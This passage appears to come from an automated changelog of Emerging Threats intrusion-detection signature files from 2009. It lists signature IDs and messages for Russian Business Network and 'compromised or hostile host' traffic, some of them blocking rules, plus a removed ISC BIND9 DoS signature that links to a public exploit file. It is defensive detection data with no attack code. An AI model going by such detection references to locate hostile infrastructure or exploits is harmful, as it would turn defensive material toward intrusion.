RBN Known Russian Business Network IP TCP (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406743 || ET RBN Known Russian Business Network IP UDP (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406744 || ET RBN Known Russian Business Network IP TCP (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406745 || ET RBN Known Russian Business Network IP UDP (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406746 || ET RBN Known Russian Business Network IP TCP (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406747 || ET RBN Known Russian Business Network IP UDP (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406748 || ET RBN Known Russian Business Network IP TCP (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406749 || ET RBN Known Russian Business Network IP UDP (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406750 || ET RBN Known Russian Business Network IP TCP (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406751 || ET RBN Known Russian Business Network IP UDP (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406752 || ET RBN Known Russian Business Network IP TCP (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406753 || ET RBN Known Russian Business Network IP UDP (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406754 || ET RBN Known Russian Business Network IP TCP (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406755 || ET RBN Known Russian Business Network IP UDP (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406756 || ET RBN Known Russian Business Network IP TCP (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406757 || ET RBN Known Russian Business Network IP UDP (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406758 || ET RBN Known Russian Business Network IP TCP (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406759 || ET RBN Known Russian Business Network IP UDP (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406760 || ET RBN Known Russian Business Network IP TCP (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406761 || ET RBN Known Russian Business Network IP UDP (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406762 || ET RBN Known Russian Business Network IP TCP (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406763 || ET RBN Known Russian Business Network IP UDP (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406764 || ET RBN Known Russian Business Network IP TCP (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406765 || ET RBN Known Russian Business Network IP UDP (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406766 || ET RBN Known Russian Business Network IP TCP (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406767 || ET RBN Known Russian Business Network IP UDP (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406768 || ET RBN Known Russian Business Network IP TCP (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406769 || ET RBN Known Russian Business Network IP UDP (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406770 || ET RBN Known Russian Business Network IP TCP (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406771 || ET RBN Known Russian Business Network IP UDP (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406772 || ET RBN Known Russian Business Network IP TCP (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406773 || ET RBN Known Russian Business Network IP UDP (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406774 || ET RBN Known Russian Business Network IP TCP (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406775 || ET RBN Known Russian Business Network IP UDP (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407730 || ET RBN Known Russian Business Network IP TCP - BLOCKING (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407731 || ET RBN Known Russian Business Network IP UDP - BLOCKING (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407732 || ET RBN Known Russian Business Network IP TCP - BLOCKING (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407733 || ET RBN Known Russian Business Network IP UDP - BLOCKING (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407734 || ET RBN Known Russian Business Network IP TCP - BLOCKING (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407735 || ET RBN Known Russian Business Network IP UDP - BLOCKING (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407736 || ET RBN Known Russian Business Network IP TCP - BLOCKING (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407737 || ET RBN Known Russian Business Network IP UDP - BLOCKING (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407738 || ET RBN Known Russian Business Network IP TCP - BLOCKING (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407739 || ET RBN Known Russian Business Network IP UDP - BLOCKING (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407740 || ET RBN Known Russian Business Network IP TCP - BLOCKING (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407741 || ET RBN Known Russian Business Network IP UDP - BLOCKING (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407742 || ET RBN Known Russian Business Network IP TCP - BLOCKING (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407743 || ET RBN Known Russian Business Network IP UDP - BLOCKING (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407744 || ET RBN Known Russian Business Network IP TCP - BLOCKING (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407745 || ET RBN Known Russian Business Network IP UDP - BLOCKING (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407746 || ET RBN Known Russian Business Network IP TCP - BLOCKING (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407747 || ET RBN Known Russian Business Network IP UDP - BLOCKING (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407748 || ET RBN Known Russian Business Network IP TCP - BLOCKING (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407749 || ET RBN Known Russian Business Network IP UDP - BLOCKING (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407750 || ET RBN Known Russian Business Network IP TCP - BLOCKING (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407751 || ET RBN Known Russian Business Network IP UDP - BLOCKING (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407752 || ET RBN Known Russian Business Network IP TCP - BLOCKING (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407753 || ET RBN Known Russian Business Network IP UDP - BLOCKING (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407754 || ET RBN Known Russian Business Network IP TCP - BLOCKING (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407755 || ET RBN Known Russian Business Network IP UDP - BLOCKING (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407756 || ET RBN Known Russian Business Network IP TCP - BLOCKING (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407757 || ET RBN Known Russian Business Network IP UDP - BLOCKING (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407758 || ET RBN Known Russian Business Network IP TCP - BLOCKING (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407759 || ET RBN Known Russian Business Network IP UDP - BLOCKING (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407760 || ET RBN Known Russian Business Network IP TCP - BLOCKING (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407761 || ET RBN Known Russian Business Network IP UDP - BLOCKING (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407762 || ET RBN Known Russian Business Network IP TCP - BLOCKING (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407763 || ET RBN Known Russian Business Network IP UDP - BLOCKING (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407764 || ET RBN Known Russian Business Network IP TCP - BLOCKING (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407765 || ET RBN Known Russian Business Network IP UDP - BLOCKING (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407766 || ET RBN Known Russian Business Network IP TCP - BLOCKING (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407767 || ET RBN Known Russian Business Network IP UDP - BLOCKING (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407768 || ET RBN Known Russian Business Network IP TCP - BLOCKING (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407769 || ET RBN Known Russian Business Network IP UDP - BLOCKING (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407770 || ET RBN Known Russian Business Network IP TCP - BLOCKING (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407771 || ET RBN Known Russian Business Network IP UDP - BLOCKING (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407772 || ET RBN Known Russian Business Network IP TCP - BLOCKING (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407773 || ET RBN Known Russian Business Network IP UDP - BLOCKING (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407774 || ET RBN Known Russian Business Network IP TCP - BLOCKING (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407775 || ET RBN Known Russian Business Network IP UDP - BLOCKING (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork [---] Removed non-rule lines: [---] -> Removed from emerging-rbn-BLOCK.rules (2): # VERSION 140 # Updated 2009-07-02 16:36:24 -> Removed from emerging-rbn.rules (2): # VERSION 140 # Updated 2009-07-02 16:36:24 -> Removed from emerging-sid-msg.map (77): 2009695 || ET CURRENT_EVENTS ISC BIND9 Update DoS || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009695 || url,www.isc.org/node/474 || url,downloads.securityfocus.com/vulnerabilities/exploits/35848.txt 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (77): 2009695 || ET CURRENT_EVENTS ISC BIND9 Update DoS || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009695 || url,www.isc.org/node/474 || url,downloads.securityfocus.com/vulnerabilities/exploits/35848.txt 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || 